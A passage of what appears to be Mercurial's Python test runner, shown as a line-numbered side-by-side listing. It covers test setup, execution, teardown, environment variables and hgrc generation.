943 of the form "foo.key=value" will result in "[foo] key=value".
944
944
945 py3warnings enables Py3k warnings.
945 py3warnings enables Py3k warnings.
946
946
947 shell is the shell to execute tests in.
947 shell is the shell to execute tests in.
948 """
948 """
949 if timeout is None:
949 if timeout is None:
950 timeout = defaults['timeout']
950 timeout = defaults['timeout']
951 if startport is None:
951 if startport is None:
952 startport = defaults['port']
952 startport = defaults['port']
953 if slowtimeout is None:
953 if slowtimeout is None:
954 slowtimeout = defaults['slowtimeout']
954 slowtimeout = defaults['slowtimeout']
955 self.path = path
955 self.path = path
956 self.bname = os.path.basename(path)
956 self.bname = os.path.basename(path)
957 self.name = _strpath(self.bname)
957 self.name = _strpath(self.bname)
958 self._testdir = os.path.dirname(path)
958 self._testdir = os.path.dirname(path)
959 self._outputdir = outputdir
959 self._outputdir = outputdir
960 self._tmpname = os.path.basename(path)
960 self._tmpname = os.path.basename(path)
961 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
961 self.errpath = os.path.join(self._outputdir, b'%s.err' % self.bname)
962
962
963 self._threadtmp = tmpdir
963 self._threadtmp = tmpdir
964 self._keeptmpdir = keeptmpdir
964 self._keeptmpdir = keeptmpdir
965 self._debug = debug
965 self._debug = debug
966 self._first = first
966 self._first = first
967 self._timeout = timeout
967 self._timeout = timeout
968 self._slowtimeout = slowtimeout
968 self._slowtimeout = slowtimeout
969 self._startport = startport
969 self._startport = startport
970 self._extraconfigopts = extraconfigopts or []
970 self._extraconfigopts = extraconfigopts or []
971 self._py3warnings = py3warnings
971 self._py3warnings = py3warnings
972 self._shell = _bytespath(shell)
972 self._shell = _bytespath(shell)
973 self._hgcommand = hgcommand or b'hg'
973 self._hgcommand = hgcommand or b'hg'
974 self._usechg = usechg
974 self._usechg = usechg
975 self._useipv6 = useipv6
975 self._useipv6 = useipv6
976
976
977 self._aborted = False
977 self._aborted = False
978 self._daemonpids = []
978 self._daemonpids = []
979 self._finished = None
979 self._finished = None
980 self._ret = None
980 self._ret = None
981 self._out = None
981 self._out = None
982 self._skipped = None
982 self._skipped = None
983 self._testtmp = None
983 self._testtmp = None
984 self._chgsockdir = None
984 self._chgsockdir = None
985
985
986 self._refout = self.readrefout()
986 self._refout = self.readrefout()
987
987
988 def readrefout(self):
988 def readrefout(self):
989 """read reference output"""
989 """read reference output"""
990 # If we're not in --debug mode and reference output file exists,
990 # If we're not in --debug mode and reference output file exists,
991 # check test output against it.
991 # check test output against it.
992 if self._debug:
992 if self._debug:
993 return None # to match "out is None"
993 return None # to match "out is None"
994 elif os.path.exists(self.refpath):
994 elif os.path.exists(self.refpath):
995 with open(self.refpath, 'rb') as f:
995 with open(self.refpath, 'rb') as f:
996 return f.read().splitlines(True)
996 return f.read().splitlines(True)
997 else:
997 else:
998 return []
998 return []
999
999
1000 # needed to get base class __repr__ running
1000 # needed to get base class __repr__ running
1001 @property
1001 @property
1002 def _testMethodName(self):
1002 def _testMethodName(self):
1003 return self.name
1003 return self.name
1004
1004
1005 def __str__(self):
1005 def __str__(self):
1006 return self.name
1006 return self.name
1007
1007
1008 def shortDescription(self):
1008 def shortDescription(self):
1009 return self.name
1009 return self.name
1010
1010
1011 def setUp(self):
1011 def setUp(self):
1012 """Tasks to perform before run()."""
1012 """Tasks to perform before run()."""
1013 self._finished = False
1013 self._finished = False
1014 self._ret = None
1014 self._ret = None
1015 self._out = None
1015 self._out = None
1016 self._skipped = None
1016 self._skipped = None
1017
1017
1018 try:
1018 try:
1019 os.mkdir(self._threadtmp)
1019 os.mkdir(self._threadtmp)
1020 except OSError as e:
1020 except OSError as e:
1021 if e.errno != errno.EEXIST:
1021 if e.errno != errno.EEXIST:
1022 raise
1022 raise
1023
1023
1024 name = self._tmpname
1024 name = self._tmpname
1025 self._testtmp = os.path.join(self._threadtmp, name)
1025 self._testtmp = os.path.join(self._threadtmp, name)
1026 os.mkdir(self._testtmp)
1026 os.mkdir(self._testtmp)
1027
1027
1028 # Remove any previous output files.
1028 # Remove any previous output files.
1029 if os.path.exists(self.errpath):
1029 if os.path.exists(self.errpath):
1030 try:
1030 try:
1031 os.remove(self.errpath)
1031 os.remove(self.errpath)
1032 except OSError as e:
1032 except OSError as e:
1033 # We might have raced another test to clean up a .err
1033 # We might have raced another test to clean up a .err
1034 # file, so ignore ENOENT when removing a previous .err
1034 # file, so ignore ENOENT when removing a previous .err
1035 # file.
1035 # file.
1036 if e.errno != errno.ENOENT:
1036 if e.errno != errno.ENOENT:
1037 raise
1037 raise
1038
1038
1039 if self._usechg:
1039 if self._usechg:
1040 self._chgsockdir = os.path.join(
1040 self._chgsockdir = os.path.join(
1041 self._threadtmp, b'%s.chgsock' % name
1041 self._threadtmp, b'%s.chgsock' % name
1042 )
1042 )
1043 os.mkdir(self._chgsockdir)
1043 os.mkdir(self._chgsockdir)
1044
1044
1045 def run(self, result):
1045 def run(self, result):
1046 """Run this test and report results against a TestResult instance."""
1046 """Run this test and report results against a TestResult instance."""
1047 # This function is extremely similar to unittest.TestCase.run(). Once
1047 # This function is extremely similar to unittest.TestCase.run(). Once
1048 # we require Python 2.7 (or at least its version of unittest), this
1048 # we require Python 2.7 (or at least its version of unittest), this
1049 # function can largely go away.
1049 # function can largely go away.
1050 self._result = result
1050 self._result = result
1051 result.startTest(self)
1051 result.startTest(self)
1052 try:
1052 try:
1053 try:
1053 try:
1054 self.setUp()
1054 self.setUp()
1055 except (KeyboardInterrupt, SystemExit):
1055 except (KeyboardInterrupt, SystemExit):
1056 self._aborted = True
1056 self._aborted = True
1057 raise
1057 raise
1058 except Exception:
1058 except Exception:
1059 result.addError(self, sys.exc_info())
1059 result.addError(self, sys.exc_info())
1060 return
1060 return
1061
1061
1062 success = False
1062 success = False
1063 try:
1063 try:
1064 self.runTest()
1064 self.runTest()
1065 except KeyboardInterrupt:
1065 except KeyboardInterrupt:
1066 self._aborted = True
1066 self._aborted = True
1067 raise
1067 raise
1068 except unittest.SkipTest as e:
1068 except unittest.SkipTest as e:
1069 result.addSkip(self, str(e))
1069 result.addSkip(self, str(e))
1070 # The base class will have already counted this as a
1070 # The base class will have already counted this as a
1071 # test we "ran", but we want to exclude skipped tests
1071 # test we "ran", but we want to exclude skipped tests
1072 # from those we count towards those run.
1072 # from those we count towards those run.
1073 result.testsRun -= 1
1073 result.testsRun -= 1
1074 except self.failureException as e:
1074 except self.failureException as e:
1075 # This differs from unittest in that we don't capture
1075 # This differs from unittest in that we don't capture
1076 # the stack trace. This is for historical reasons and
1076 # the stack trace. This is for historical reasons and
1077 # this decision could be revisited in the future,
1077 # this decision could be revisited in the future,
1078 # especially for PythonTest instances.
1078 # especially for PythonTest instances.
1079 if result.addFailure(self, str(e)):
1079 if result.addFailure(self, str(e)):
1080 success = True
1080 success = True
1081 except Exception:
1081 except Exception:
1082 result.addError(self, sys.exc_info())
1082 result.addError(self, sys.exc_info())
1083 else:
1083 else:
1084 success = True
1084 success = True
1085
1085
1086 try:
1086 try:
1087 self.tearDown()
1087 self.tearDown()
1088 except (KeyboardInterrupt, SystemExit):
1088 except (KeyboardInterrupt, SystemExit):
1089 self._aborted = True
1089 self._aborted = True
1090 raise
1090 raise
1091 except Exception:
1091 except Exception:
1092 result.addError(self, sys.exc_info())
1092 result.addError(self, sys.exc_info())
1093 success = False
1093 success = False
1094
1094
1095 if success:
1095 if success:
1096 result.addSuccess(self)
1096 result.addSuccess(self)
1097 finally:
1097 finally:
1098 result.stopTest(self, interrupted=self._aborted)
1098 result.stopTest(self, interrupted=self._aborted)
1099
1099
1100 def runTest(self):
1100 def runTest(self):
1101 """Run this test instance.
1101 """Run this test instance.
1102
1102
1103 This will return a tuple describing the result of the test.
1103 This will return a tuple describing the result of the test.
1104 """
1104 """
1105 env = self._getenv()
1105 env = self._getenv()
1106 self._genrestoreenv(env)
1106 self._genrestoreenv(env)
1107 self._daemonpids.append(env['DAEMON_PIDS'])
1107 self._daemonpids.append(env['DAEMON_PIDS'])
1108 self._createhgrc(env['HGRCPATH'])
1108 self._createhgrc(env['HGRCPATH'])
1109
1109
1110 vlog('# Test', self.name)
1110 vlog('# Test', self.name)
1111
1111
1112 ret, out = self._run(env)
1112 ret, out = self._run(env)
1113 self._finished = True
1113 self._finished = True
1114 self._ret = ret
1114 self._ret = ret
1115 self._out = out
1115 self._out = out
1116
1116
1117 def describe(ret):
1117 def describe(ret):
1118 if ret < 0:
1118 if ret < 0:
1119 return 'killed by signal: %d' % -ret
1119 return 'killed by signal: %d' % -ret
1120 return 'returned error code %d' % ret
1120 return 'returned error code %d' % ret
1121
1121
1122 self._skipped = False
1122 self._skipped = False
1123
1123
1124 if ret == self.SKIPPED_STATUS:
1124 if ret == self.SKIPPED_STATUS:
1125 if out is None: # Debug mode, nothing to parse.
1125 if out is None: # Debug mode, nothing to parse.
1126 missing = ['unknown']
1126 missing = ['unknown']
1127 failed = None
1127 failed = None
1128 else:
1128 else:
1129 missing, failed = TTest.parsehghaveoutput(out)
1129 missing, failed = TTest.parsehghaveoutput(out)
1130
1130
1131 if not missing:
1131 if not missing:
1132 missing = ['skipped']
1132 missing = ['skipped']
1133
1133
1134 if failed:
1134 if failed:
1135 self.fail('hg have failed checking for %s' % failed[-1])
1135 self.fail('hg have failed checking for %s' % failed[-1])
1136 else:
1136 else:
1137 self._skipped = True
1137 self._skipped = True
1138 raise unittest.SkipTest(missing[-1])
1138 raise unittest.SkipTest(missing[-1])
1139 elif ret == 'timeout':
1139 elif ret == 'timeout':
1140 self.fail('timed out')
1140 self.fail('timed out')
1141 elif ret is False:
1141 elif ret is False:
1142 self.fail('no result code from test')
1142 self.fail('no result code from test')
1143 elif out != self._refout:
1143 elif out != self._refout:
1144 # Diff generation may rely on written .err file.
1144 # Diff generation may rely on written .err file.
1145 if (
1145 if (
1146 (ret != 0 or out != self._refout)
1146 (ret != 0 or out != self._refout)
1147 and not self._skipped
1147 and not self._skipped
1148 and not self._debug
1148 and not self._debug
1149 ):
1149 ):
1150 with open(self.errpath, 'wb') as f:
1150 with open(self.errpath, 'wb') as f:
1151 for line in out:
1151 for line in out:
1152 f.write(line)
1152 f.write(line)
1153
1153
1154 # The result object handles diff calculation for us.
1154 # The result object handles diff calculation for us.
1155 with firstlock:
1155 with firstlock:
1156 if self._result.addOutputMismatch(self, ret, out, self._refout):
1156 if self._result.addOutputMismatch(self, ret, out, self._refout):
1157 # change was accepted, skip failing
1157 # change was accepted, skip failing
1158 return
1158 return
1159 if self._first:
1159 if self._first:
1160 global firsterror
1160 global firsterror
1161 firsterror = True
1161 firsterror = True
1162
1162
1163 if ret:
1163 if ret:
1164 msg = 'output changed and ' + describe(ret)
1164 msg = 'output changed and ' + describe(ret)
1165 else:
1165 else:
1166 msg = 'output changed'
1166 msg = 'output changed'
1167
1167
1168 self.fail(msg)
1168 self.fail(msg)
1169 elif ret:
1169 elif ret:
1170 self.fail(describe(ret))
1170 self.fail(describe(ret))
1171
1171
1172 def tearDown(self):
1172 def tearDown(self):
1173 """Tasks to perform after run()."""
1173 """Tasks to perform after run()."""
1174 for entry in self._daemonpids:
1174 for entry in self._daemonpids:
1175 killdaemons(entry)
1175 killdaemons(entry)
1176 self._daemonpids = []
1176 self._daemonpids = []
1177
1177
1178 if self._keeptmpdir:
1178 if self._keeptmpdir:
1179 log(
1179 log(
1180 '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
1180 '\nKeeping testtmp dir: %s\nKeeping threadtmp dir: %s'
1181 % (
1181 % (
1182 self._testtmp.decode('utf-8'),
1182 self._testtmp.decode('utf-8'),
1183 self._threadtmp.decode('utf-8'),
1183 self._threadtmp.decode('utf-8'),
1184 )
1184 )
1185 )
1185 )
1186 else:
1186 else:
1187 try:
1187 try:
1188 shutil.rmtree(self._testtmp)
1188 shutil.rmtree(self._testtmp)
1189 except OSError:
1189 except OSError:
1190 # unreadable directory may be left in $TESTTMP; fix permission
1190 # unreadable directory may be left in $TESTTMP; fix permission
1191 # and try again
1191 # and try again
1192 makecleanable(self._testtmp)
1192 makecleanable(self._testtmp)
1193 shutil.rmtree(self._testtmp, True)
1193 shutil.rmtree(self._testtmp, True)
1194 shutil.rmtree(self._threadtmp, True)
1194 shutil.rmtree(self._threadtmp, True)
1195
1195
1196 if self._usechg:
1196 if self._usechg:
1197 # chgservers will stop automatically after they find the socket
1197 # chgservers will stop automatically after they find the socket
1198 # files are deleted
1198 # files are deleted
1199 shutil.rmtree(self._chgsockdir, True)
1199 shutil.rmtree(self._chgsockdir, True)
1200
1200
1201 if (
1201 if (
1202 (self._ret != 0 or self._out != self._refout)
1202 (self._ret != 0 or self._out != self._refout)
1203 and not self._skipped
1203 and not self._skipped
1204 and not self._debug
1204 and not self._debug
1205 and self._out
1205 and self._out
1206 ):
1206 ):
1207 with open(self.errpath, 'wb') as f:
1207 with open(self.errpath, 'wb') as f:
1208 for line in self._out:
1208 for line in self._out:
1209 f.write(line)
1209 f.write(line)
1210
1210
1211 vlog("# Ret was:", self._ret, '(%s)' % self.name)
1211 vlog("# Ret was:", self._ret, '(%s)' % self.name)
1212
1212
1213 def _run(self, env):
1213 def _run(self, env):
1214 # This should be implemented in child classes to run tests.
1214 # This should be implemented in child classes to run tests.
1215 raise unittest.SkipTest('unknown test type')
1215 raise unittest.SkipTest('unknown test type')
1216
1216
1217 def abort(self):
1217 def abort(self):
1218 """Terminate execution of this test."""
1218 """Terminate execution of this test."""
1219 self._aborted = True
1219 self._aborted = True
1220
1220
1221 def _portmap(self, i):
1221 def _portmap(self, i):
1222 offset = b'' if i == 0 else b'%d' % i
1222 offset = b'' if i == 0 else b'%d' % i
1223 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1223 return (br':%d\b' % (self._startport + i), b':$HGPORT%s' % offset)
1224
1224
1225 def _getreplacements(self):
1225 def _getreplacements(self):
1226 """Obtain a mapping of text replacements to apply to test output.
1226 """Obtain a mapping of text replacements to apply to test output.
1227
1227
1228 Test output needs to be normalized so it can be compared to expected
1228 Test output needs to be normalized so it can be compared to expected
1229 output. This function defines how some of that normalization will
1229 output. This function defines how some of that normalization will
1230 occur.
1230 occur.
1231 """
1231 """
1232 r = [
1232 r = [
1233 # This list should be parallel to defineport in _getenv
1233 # This list should be parallel to defineport in _getenv
1234 self._portmap(0),
1234 self._portmap(0),
1235 self._portmap(1),
1235 self._portmap(1),
1236 self._portmap(2),
1236 self._portmap(2),
1237 (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
1237 (br'([^0-9])%s' % re.escape(self._localip()), br'\1$LOCALIP'),
1238 (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
1238 (br'\bHG_TXNID=TXN:[a-f0-9]{40}\b', br'HG_TXNID=TXN:$ID$'),
1239 ]
1239 ]
1240 r.append((self._escapepath(self._testtmp), b'$TESTTMP'))
1240 r.append((self._escapepath(self._testtmp), b'$TESTTMP'))
1241
1241
1242 replacementfile = os.path.join(self._testdir, b'common-pattern.py')
1242 replacementfile = os.path.join(self._testdir, b'common-pattern.py')
1243
1243
1244 if os.path.exists(replacementfile):
1244 if os.path.exists(replacementfile):
1245 data = {}
1245 data = {}
1246 with open(replacementfile, mode='rb') as source:
1246 with open(replacementfile, mode='rb') as source:
1247 # the intermediate 'compile' step help with debugging
1247 # the intermediate 'compile' step help with debugging
1248 code = compile(source.read(), replacementfile, 'exec')
1248 code = compile(source.read(), replacementfile, 'exec')
1249 exec(code, data)
1249 exec(code, data)
1250 for value in data.get('substitutions', ()):
1250 for value in data.get('substitutions', ()):
1251 if len(value) != 2:
1251 if len(value) != 2:
1252 msg = 'malformatted substitution in %s: %r'
1252 msg = 'malformatted substitution in %s: %r'
1253 msg %= (replacementfile, value)
1253 msg %= (replacementfile, value)
1254 raise ValueError(msg)
1254 raise ValueError(msg)
1255 r.append(value)
1255 r.append(value)
1256 return r
1256 return r
1257
1257
1258 def _escapepath(self, p):
1258 def _escapepath(self, p):
1259 if os.name == 'nt':
1259 if os.name == 'nt':
1260 return b''.join(
1260 return b''.join(
1261 c.isalpha()
1261 c.isalpha()
1262 and b'[%s%s]' % (c.lower(), c.upper())
1262 and b'[%s%s]' % (c.lower(), c.upper())
1263 or c in b'/\\'
1263 or c in b'/\\'
1264 and br'[/\\]'
1264 and br'[/\\]'
1265 or c.isdigit()
1265 or c.isdigit()
1266 and c
1266 and c
1267 or b'\\' + c
1267 or b'\\' + c
1268 for c in [p[i : i + 1] for i in range(len(p))]
1268 for c in [p[i : i + 1] for i in range(len(p))]
1269 )
1269 )
1270 else:
1270 else:
1271 return re.escape(p)
1271 return re.escape(p)
1272
1272
1273 def _localip(self):
1273 def _localip(self):
1274 if self._useipv6:
1274 if self._useipv6:
1275 return b'::1'
1275 return b'::1'
1276 else:
1276 else:
1277 return b'127.0.0.1'
1277 return b'127.0.0.1'
1278
1278
1279 def _genrestoreenv(self, testenv):
1279 def _genrestoreenv(self, testenv):
1280 """Generate a script that can be used by tests to restore the original
1280 """Generate a script that can be used by tests to restore the original
1281 environment."""
1281 environment."""
1282 # Put the restoreenv script inside self._threadtmp
1282 # Put the restoreenv script inside self._threadtmp
1283 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1283 scriptpath = os.path.join(self._threadtmp, b'restoreenv.sh')
1284 testenv['HGTEST_RESTOREENV'] = _strpath(scriptpath)
1284 testenv['HGTEST_RESTOREENV'] = _strpath(scriptpath)
1285
1285
1286 # Only restore environment variable names that the shell allows
1286 # Only restore environment variable names that the shell allows
1287 # us to export.
1287 # us to export.
1288 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1288 name_regex = re.compile('^[a-zA-Z][a-zA-Z0-9_]*$')
1289
1289
1290 # Do not restore these variables; otherwise tests would fail.
1290 # Do not restore these variables; otherwise tests would fail.
1291 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1291 reqnames = {'PYTHON', 'TESTDIR', 'TESTTMP'}
1292
1292
1293 with open(scriptpath, 'w') as envf:
1293 with open(scriptpath, 'w') as envf:
1294 for name, value in origenviron.items():
1294 for name, value in origenviron.items():
1295 if not name_regex.match(name):
1295 if not name_regex.match(name):
1296 # Skip environment variables with unusual names not
1296 # Skip environment variables with unusual names not
1297 # allowed by most shells.
1297 # allowed by most shells.
1298 continue
1298 continue
1299 if name in reqnames:
1299 if name in reqnames:
1300 continue
1300 continue
1301 envf.write('%s=%s\n' % (name, shellquote(value)))
1301 envf.write('%s=%s\n' % (name, shellquote(value)))
1302
1302
1303 for name in testenv:
1303 for name in testenv:
1304 if name in origenviron or name in reqnames:
1304 if name in origenviron or name in reqnames:
1305 continue
1305 continue
1306 envf.write('unset %s\n' % (name,))
1306 envf.write('unset %s\n' % (name,))
1307
1307
1308 def _getenv(self):
1308 def _getenv(self):
1309 """Obtain environment variables to use during test execution."""
1309 """Obtain environment variables to use during test execution."""
1310
1310
1311 def defineport(i):
1311 def defineport(i):
1312 offset = '' if i == 0 else '%s' % i
1312 offset = '' if i == 0 else '%s' % i
1313 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1313 env["HGPORT%s" % offset] = '%s' % (self._startport + i)
1314
1314
1315 env = os.environ.copy()
1315 env = os.environ.copy()
1316 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1316 env['PYTHONUSERBASE'] = sysconfig.get_config_var('userbase') or ''
1317 env['HGEMITWARNINGS'] = '1'
1317 env['HGEMITWARNINGS'] = '1'
1318 env['TESTTMP'] = _strpath(self._testtmp)
1318 env['TESTTMP'] = _strpath(self._testtmp)
1319 env['TESTNAME'] = self.name
1319 env['TESTNAME'] = self.name
1320 env['HOME'] = _strpath(self._testtmp)
1320 env['HOME'] = _strpath(self._testtmp)
1321 # This number should match portneeded in _getport
1321 # This number should match portneeded in _getport
1322 for port in xrange(3):
1322 for port in xrange(3):
1323 # This list should be parallel to _portmap in _getreplacements
1323 # This list should be parallel to _portmap in _getreplacements
1324 defineport(port)
1324 defineport(port)
1325 env["HGRCPATH"] = _strpath(os.path.join(self._threadtmp, b'.hgrc'))
1325 env["HGRCPATH"] = _strpath(os.path.join(self._threadtmp, b'.hgrc'))
1326 env["DAEMON_PIDS"] = _strpath(
1326 env["DAEMON_PIDS"] = _strpath(
1327 os.path.join(self._threadtmp, b'daemon.pids')
1327 os.path.join(self._threadtmp, b'daemon.pids')
1328 )
1328 )
1329 env["HGEDITOR"] = (
1329 env["HGEDITOR"] = (
1330 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1330 '"' + sysexecutable + '"' + ' -c "import sys; sys.exit(0)"'
1331 )
1331 )
1332 env["HGUSER"] = "test"
1332 env["HGUSER"] = "test"
1333 env["HGENCODING"] = "ascii"
1333 env["HGENCODING"] = "ascii"
1334 env["HGENCODINGMODE"] = "strict"
1334 env["HGENCODINGMODE"] = "strict"
1335 env["HGHOSTNAME"] = "test-hostname"
1335 env["HGHOSTNAME"] = "test-hostname"
1336 env['HGIPV6'] = str(int(self._useipv6))
1336 env['HGIPV6'] = str(int(self._useipv6))
1337 # See contrib/catapipe.py for how to use this functionality.
1337 # See contrib/catapipe.py for how to use this functionality.
1338 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1338 if 'HGTESTCATAPULTSERVERPIPE' not in env:
1339 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1339 # If we don't have HGTESTCATAPULTSERVERPIPE explicitly set, pull the
1340 # non-test one in as a default, otherwise set to devnull
1340 # non-test one in as a default, otherwise set to devnull
1341 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1341 env['HGTESTCATAPULTSERVERPIPE'] = env.get(
1342 'HGCATAPULTSERVERPIPE', os.devnull
1342 'HGCATAPULTSERVERPIPE', os.devnull
1343 )
1343 )
1344
1344
1345 extraextensions = []
1345 extraextensions = []
1346 for opt in self._extraconfigopts:
1346 for opt in self._extraconfigopts:
1347 section, key = opt.encode('utf-8').split(b'.', 1)
1347 section, key = opt.encode('utf-8').split(b'.', 1)
1348 if section != 'extensions':
1348 if section != 'extensions':
1349 continue
1349 continue
1350 name = key.split(b'=', 1)[0]
1350 name = key.split(b'=', 1)[0]
1351 extraextensions.append(name)
1351 extraextensions.append(name)
1352
1352
1353 if extraextensions:
1353 if extraextensions:
1354 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1354 env['HGTESTEXTRAEXTENSIONS'] = b' '.join(extraextensions)
1355
1355
1356 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1356 # LOCALIP could be ::1 or 127.0.0.1. Useful for tests that require raw
1357 # IP addresses.
1357 # IP addresses.
1358 env['LOCALIP'] = _strpath(self._localip())
1358 env['LOCALIP'] = _strpath(self._localip())
1359
1359
1360 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1360 # This has the same effect as Py_LegacyWindowsStdioFlag in exewrapper.c,
1361 # but this is needed for testing python instances like dummyssh,
1361 # but this is needed for testing python instances like dummyssh,
1362 # dummysmtpd.py, and dumbhttp.py.
1362 # dummysmtpd.py, and dumbhttp.py.
1363 if PYTHON3 and os.name == 'nt':
1363 if PYTHON3 and os.name == 'nt':
1364 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1364 env['PYTHONLEGACYWINDOWSSTDIO'] = '1'
1365
1365
1366 # Modified HOME in test environment can confuse Rust tools. So set
1366 # Modified HOME in test environment can confuse Rust tools. So set
1367 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1367 # CARGO_HOME and RUSTUP_HOME automatically if a Rust toolchain is
1368 # present and these variables aren't already defined.
1368 # present and these variables aren't already defined.
1369 cargo_home_path = os.path.expanduser('~/.cargo')
1369 cargo_home_path = os.path.expanduser('~/.cargo')
1370 rustup_home_path = os.path.expanduser('~/.rustup')
1370 rustup_home_path = os.path.expanduser('~/.rustup')
1371
1371
1372 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1372 if os.path.exists(cargo_home_path) and b'CARGO_HOME' not in osenvironb:
1373 env['CARGO_HOME'] = cargo_home_path
1373 env['CARGO_HOME'] = cargo_home_path
1374 if (
1374 if (
1375 os.path.exists(rustup_home_path)
1375 os.path.exists(rustup_home_path)
1376 and b'RUSTUP_HOME' not in osenvironb
1376 and b'RUSTUP_HOME' not in osenvironb
1377 ):
1377 ):
1378 env['RUSTUP_HOME'] = rustup_home_path
1378 env['RUSTUP_HOME'] = rustup_home_path
1379
1379
1380 # Reset some environment variables to well-known values so that
1380 # Reset some environment variables to well-known values so that
1381 # the tests produce repeatable output.
1381 # the tests produce repeatable output.
1382 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1382 env['LANG'] = env['LC_ALL'] = env['LANGUAGE'] = 'C'
1383 env['TZ'] = 'GMT'
1383 env['TZ'] = 'GMT'
1384 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1384 env["EMAIL"] = "Foo Bar <foo.bar@example.com>"
1385 env['COLUMNS'] = '80'
1385 env['COLUMNS'] = '80'
1386 env['TERM'] = 'xterm'
1386 env['TERM'] = 'xterm'
1387
1387
1388 dropped = [
1388 dropped = [
1389 'CDPATH',
1389 'CDPATH',
1390 'CHGDEBUG',
1390 'CHGDEBUG',
1391 'EDITOR',
1391 'EDITOR',
1392 'GREP_OPTIONS',
1392 'GREP_OPTIONS',
1393 'HG',
1393 'HG',
1394 'HGMERGE',
1394 'HGMERGE',
1395 'HGPLAIN',
1395 'HGPLAIN',
1396 'HGPLAINEXCEPT',
1396 'HGPLAINEXCEPT',
1397 'HGPROF',
1397 'HGPROF',
1398 'http_proxy',
1398 'http_proxy',
1399 'no_proxy',
1399 'no_proxy',
1400 'NO_PROXY',
1400 'NO_PROXY',
1401 'PAGER',
1401 'PAGER',
1402 'VISUAL',
1402 'VISUAL',
1403 ]
1403 ]
1404
1404
1405 for k in dropped:
1405 for k in dropped:
1406 if k in env:
1406 if k in env:
1407 del env[k]
1407 del env[k]
1408
1408
1409 # unset env related to hooks
1409 # unset env related to hooks
1410 for k in list(env):
1410 for k in list(env):
1411 if k.startswith('HG_'):
1411 if k.startswith('HG_'):
1412 del env[k]
1412 del env[k]
1413
1413
1414 if self._usechg:
1414 if self._usechg:
1415 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1415 env['CHGSOCKNAME'] = os.path.join(self._chgsockdir, b'server')
1416
1416
1417 return env
1417 return env
1418
1418
1419 def _createhgrc(self, path):
1419 def _createhgrc(self, path):
1420 """Create an hgrc file for this test."""
1420 """Create an hgrc file for this test."""
1421 with open(path, 'wb') as hgrc:
1421 with open(path, 'wb') as hgrc:
1422 hgrc.write(b'[ui]\n')
1422 hgrc.write(b'[ui]\n')
1423 hgrc.write(b'slash = True\n')
1423 hgrc.write(b'slash = True\n')
1424 hgrc.write(b'interactive = False\n')
1424 hgrc.write(b'interactive = False\n')
1425 hgrc.write(b'merge = internal:merge\n')
1425 hgrc.write(b'merge = internal:merge\n')
1426 hgrc.write(b'mergemarkers = detailed\n')
1426 hgrc.write(b'mergemarkers = detailed\n')
1427 hgrc.write(b'promptecho = True\n')
1427 hgrc.write(b'promptecho = True\n')
1428 hgrc.write(b'[defaults]\n')
1428 hgrc.write(b'[defaults]\n')
1429 hgrc.write(b'[devel]\n')
1429 hgrc.write(b'[devel]\n')
1430 hgrc.write(b'all-warnings = true\n')
1430 hgrc.write(b'all-warnings = true\n')
1431 hgrc.write(b'default-date = 0 0\n')
1431 hgrc.write(b'default-date = 0 0\n')
1432 hgrc.write(b'[largefiles]\n')
1432 hgrc.write(b'[largefiles]\n')
1433 hgrc.write(
1433 hgrc.write(
1434 b'usercache = %s\n'
1434 b'usercache = %s\n'
1435 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1435 % (os.path.join(self._testtmp, b'.cache/largefiles'))
1436 )
1436 )
1437 hgrc.write(b'[lfs]\n')
1437 hgrc.write(b'[lfs]\n')
1438 hgrc.write(
1438 hgrc.write(
1439 b'usercache = %s\n'
1439 b'usercache = %s\n'
1440 % (os.path.join(self._testtmp, b'.cache/lfs'))
1440 % (os.path.join(self._testtmp, b'.cache/lfs'))
1441 )
1441 )
1442 hgrc.write(b'[web]\n')
1442 hgrc.write(b'[web]\n')
1443 hgrc.write(b'address = localhost\n')
1443 hgrc.write(b'address = localhost\n')
1444 hgrc.write(b'ipv6 = %s\n' % str(self._useipv6).encode('ascii'))
1444 hgrc.write(b'ipv6 = %s\n' % str(self._useipv6).encode('ascii'))
1445 hgrc.write(b'server-header = testing stub value\n')
1445 hgrc.write(b'server-header = testing stub value\n')
1446
1446
1447 for opt in self._extraconfigopts:
1447 for opt in self._extraconfigopts:
1448 section, key = opt.encode('utf-8').split(b'.', 1)
1448 section, key = opt.encode('utf-8').split(b'.', 1)
1449 assert b'=' in key, (
1449 assert b'=' in key, (
1450 'extra config opt %s must ' 'have an = for assignment' % opt
1450 'extra config opt %s must ' 'have an = for assignment' % opt
1451 )
1451 )
1452 hgrc.write(b'[%s]\n%s\n' % (section, key))
1452 hgrc.write(b'[%s]\n%s\n' % (section, key))
1453
1453
1454 def fail(self, msg):
1454 def fail(self, msg):
1455 # unittest differentiates between errored and failed.
1455 # unittest differentiates between errored and failed.
1456 # Failed is denoted by AssertionError (by default at least).
1456 # Failed is denoted by AssertionError (by default at least).
1457 raise AssertionError(msg)
1457 raise AssertionError(msg)
1458
1458
1459 def _runcommand(self, cmd, env, normalizenewlines=False):
1459 def _runcommand(self, cmd, env, normalizenewlines=False):
1460 """Run command in a sub-process, capturing the output (stdout and
1460 """Run command in a sub-process, capturing the output (stdout and
1461 stderr).
1461 stderr).
1462
1462
